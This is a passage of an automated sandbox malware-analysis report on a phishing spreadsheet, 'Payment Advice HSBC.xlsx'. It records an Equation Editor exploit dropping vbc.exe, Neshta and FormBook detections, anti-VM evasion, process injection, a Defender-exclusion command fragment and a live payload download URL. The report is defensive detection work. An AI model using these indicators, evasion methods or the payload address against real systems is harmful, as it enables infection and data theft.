Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateBroker.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateSetup.exe Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Users\Public\vbc.exe File created: C:\Windows\svchost.com Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Boot Survival:

barindex
Yara detected Neshta
Source: Yara match File source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Creates an undocumented autostart registry key
Source: C:\Users\Public\vbc.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command NULL Jump to behavior
Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Yara detected AntiVM3
Source: Yara match File source: 00000004.00000002.472098761.000000000281B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.471972955.00000000027B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 1624, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: vbc.exe, 00000004.00000002.472098761.000000000281B000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.471972955.00000000027B1000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Source: vbc.exe, 00000004.00000002.472098761.000000000281B000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.471972955.00000000027B1000.00000004.00000001.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1344 Thread sleep time: -240000s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1876 Thread sleep time: -38127s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1892 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\MSOCache\All Users\{90140000-003D-0000-1000-0000000FF1CE}-C\setup.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\ProgramData\Package Cache\{e2803110-78b3-4664-a479-3611a381656a}\VC_redist.x86.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.135\Installer\setup.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Chrome\Application\chrome_proxy.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.135\elevation_service.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateCore.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Mozilla Firefox\updater.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Windows\svchost.com Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Mozilla Firefox\uninstall\helper.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Install\{FCE087CB-E39B-4153-8CDB-9F0ACA90F73B}\GoogleUpdateSetup.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateComRegisterShell64.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\ProgramData\Oracle\Java\javapath_target_415196\java.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Mozilla Firefox\wow_helper.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\WinDirStat\windirstat.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Mozilla Firefox\maintenanceservice.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleCrashHandler.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.135\Installer\chrmstp.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Uninstall.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleCrashHandler64.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\WinDirStat\Uninstall.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\ProgramData\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\vcredist_x86.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\ProgramData\Oracle\Java\javapath_target_415196\javaws.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.135\notification_helper.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdate.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateOnDemand.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\ProgramData\Oracle\Java\javapath_target_415196\javaw.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Mozilla Firefox\plugin-container.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\ProgramData\Package Cache\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\VC_redist.x64.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Download\{430FD4D0-B729-4F61-AA34-91526481799D}\1.3.36.102\GoogleUpdateSetup.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Mozilla Firefox\minidump-analyzer.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.135\chrome_pwa_launcher.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\MSOCache\All Users\{90140000-003D-0000-1000-0000000FF1CE}-C\ose.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Mozilla Firefox\firefox.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Mozilla Firefox\maintenanceservice_installer.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Mozilla Firefox\crashreporter.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateSetup.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateBroker.exe Jump to dropped file
Contains long sleeps (>= 3 min)
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\Public\vbc.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\Public\vbc.exe Code function: 5_2_00405080 FindFirstFileA,FindNextFileA,FindClose, 5_2_00405080
Source: C:\Users\Public\vbc.exe Code function: 5_2_00405634 FindFirstFileA,FindNextFileA,FindClose, 5_2_00405634
Source: C:\Users\Public\vbc.exe Code function: 5_2_00404F6C FindFirstFileA,FindClose, 5_2_00404F6C
Source: C:\Users\Public\vbc.exe Code function: 5_2_004056A7 FindFirstFileA,FindNextFileA,FindClose, 5_2_004056A7
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 38127 Jump to behavior
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\Public\vbc.exe Code function: 5_2_00406D40 GetLogicalDriveStringsA,GetDriveTypeA,GetDriveTypeA, 5_2_00406D40
Source: C:\Users\Public\vbc.exe File opened: C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\14\BIN\1033\ Jump to behavior
Source: C:\Users\Public\vbc.exe File opened: C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\14\BIN\ Jump to behavior
Source: C:\Users\Public\vbc.exe File opened: C:\Program Files\Common Files\Microsoft Shared\Web Folders\ Jump to behavior
Source: C:\Users\Public\vbc.exe File opened: C:\Program Files\Common Files\Microsoft Shared\Web Folders\1033\ Jump to behavior
Source: C:\Users\Public\vbc.exe File opened: C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\ Jump to behavior
Source: C:\Users\Public\vbc.exe File opened: C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\14\ Jump to behavior
Source: vbc.exe, 00000004.00000002.471972955.00000000027B1000.00000004.00000001.sdmp Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
Source: vbc.exe, 00000005.00000003.590497736.00000000041E4000.00000004.00000001.sdmp Binary or memory string: C:\Windows\winsxs\amd64_microsoft-windows-m..eplacementmanifests_31bf3856ad364e35_6.1.7601.17514_none_5a1a617d021715d4\microsoft-hyper-v-migration-replacement.man
Source: vbc.exe, 00000005.00000003.590497736.00000000041E4000.00000004.00000001.sdmp Binary or memory string: microsoft-hyper-v-migration-replacement.man
Source: vbc.exe, 00000004.00000002.471972955.00000000027B1000.00000004.00000001.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000005.00000003.566737357.0000000000960000.00000004.00000001.sdmp Binary or memory string: .amd64_microsoft-hyper-v-drivers-vmswitch_31bf3856ad364e35_6.1.7601.23677_none_c77ccf83b0083969.manifestifest@
Source: vbc.exe, 00000004.00000002.471972955.00000000027B1000.00000004.00000001.sdmp Binary or memory string: vmware
Source: vbc.exe, 00000005.00000003.590497736.00000000041E4000.00000004.00000001.sdmp Binary or memory string: .microsoft-hyper-v-drivers-migration-replacement.mannt-Replacement.man@
Source: vbc.exe, 00000005.00000003.590497736.00000000041E4000.00000004.00000001.sdmp Binary or memory string: microsoft-hyper-v-migration-replacement.
Source: vbc.exe, 00000005.00000003.590497736.00000000041E4000.00000004.00000001.sdmp Binary or memory string: 5_6.1.7601.17514_none_5a1a617d021715d4\microsoft-hyper-v-drivers-migration-replacement.m
Source: vbc.exe, 00000005.00000003.581083188.0000000000998000.00000004.00000001.sdmp Binary or memory string: $.microsoft-hyper-v-client-migration-replacement.mannt-Replacement.man@
Source: vbc.exe, 00000005.00000003.590497736.00000000041E4000.00000004.00000001.sdmp, vbc.exe, 00000005.00000003.581083188.0000000000998000.00000004.00000001.sdmp Binary or memory string: microsoft-hyper-v-client-migration-replacement.man
Source: vbc.exe, 00000005.00000003.590497736.00000000041E4000.00000004.00000001.sdmp Binary or memory string: microsoft-hyper-v-drivers-migration-replacement.man
Source: vbc.exe, 00000005.00000003.566737357.0000000000960000.00000004.00000001.sdmp Binary or memory string: amd64_microsoft-hyper-v-d..switch-forceproject_31bf3856ad364e35_6.1.7601.23677_none_d4dd436f4654a5d0.manifest
Source: vbc.exe, 00000005.00000003.590497736.00000000041E4000.00000004.00000001.sdmp Binary or memory string: ;+microsoft-hyper-v-migration-replacement.
Source: vbc.exe, 00000005.00000003.566737357.0000000000960000.00000004.00000001.sdmp Binary or memory string: .amd64_microsoft-hyper-v-d..switch-forceproject_31bf3856ad364e35_6.1.7601.23677_none_d4dd436f4654a5d0.manifest@
Source: vbc.exe, 00000005.00000003.590497736.00000000041E4000.00000004.00000001.sdmp Binary or memory string: .microsoft-hyper-v-client-migration-replacement.mannt-Replacement.man@
Source: vbc.exe, 00000005.00000003.566737357.0000000000960000.00000004.00000001.sdmp Binary or memory string: amd64_microsoft-hyper-v-drivers-vmswitch_31bf3856ad364e35_6.1.7601.23677_none_c77ccf83b0083969.manifest
Source: vbc.exe, 00000005.00000003.590497736.00000000041E4000.00000004.00000001.sdmp Binary or memory string: .microsoft-hyper-v-migration-replacement.manent.mannt-Replacement.man@
Source: vbc.exe, 00000004.00000002.471972955.00000000027B1000.00000004.00000001.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Anti Debugging:

barindex
Enables debug privileges
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Injects a PE file into a foreign processes
Source: C:\Users\Public\vbc.exe Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Users\Public\vbc.exe VolumeInformation Jump to behavior
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\Public\vbc.exe Code function: GetLocaleInfoA, 5_2_00403CB4
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\Public\vbc.exe Code function: 5_2_004057D8 GetLocalTime, 5_2_004057D8
Source: C:\Users\Public\vbc.exe Code function: 5_2_00403D7D GetCommandLineA,GetVersion,GetVersion,GetThreadLocale,GetThreadLocale,GetCurrentThreadId, 5_2_00403D7D

Stealing of Sensitive Information:

barindex
Yara detected Neshta
Source: Yara match File source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Yara detected FormBook
Source: Yara match File source: 00000004.00000002.472955830.000000000394E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.473024128.00000000039A1000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 00000004.00000002.472955830.000000000394E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.473024128.00000000039A1000.00000004.00000001.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 528781 Sample: Payment Advice HSBC.xlsx Startdate: 25/11/2021 Architecture: WINDOWS Score: 100 37 Multi AV Scanner detection for domain / URL 2->37 39 Malicious sample detected (through community Yara rule) 2->39 41 Antivirus detection for URL or domain 2->41 43 14 other signatures 2->43 7 EQNEDT32.EXE 12 2->7         started        12 EXCEL.EXE 33 31 2->12         started        process3 dnsIp4 35 198.12.91.205, 49165, 80 AS-COLOCROSSINGUS United States 7->35 29 C:\Users\user\AppData\Local\...\vbc[1].exe, PE32 7->29 dropped 31 C:\Users\Public\vbc.exe, PE32 7->31 dropped 51 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 7->51 14 vbc.exe 7->14         started        33 C:\Users\user\...\~$Payment Advice HSBC.xlsx, data 12->33 dropped file5 signatures6 process7 signatures8 53 Drops PE files with a suspicious file extension 14->53 55 Injects a PE file into a foreign processes 14->55 17 vbc.exe 5 14->17         started        process9 file10 21 C:\Windows\svchost.com, PE32 17->21 dropped 23 C:\ProgramData\...\vcredist_x86.exe, PE32 17->23 dropped 25 C:\ProgramData\...\VC_redist.x86.exe, PE32 17->25 dropped 27 76 other malicious files 17->27 dropped 45 Creates an undocumented autostart registry key 17->45 47 Drops executable to a common third party application directory 17->47 49 Infects executable files (exe, dll, sys, html) 17->49 signatures11
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
198.12.91.205
 unknown United States
36352 AS-COLOCROSSINGUS true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://198.12.91.205/50005/vbc.exe true
  • 5%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown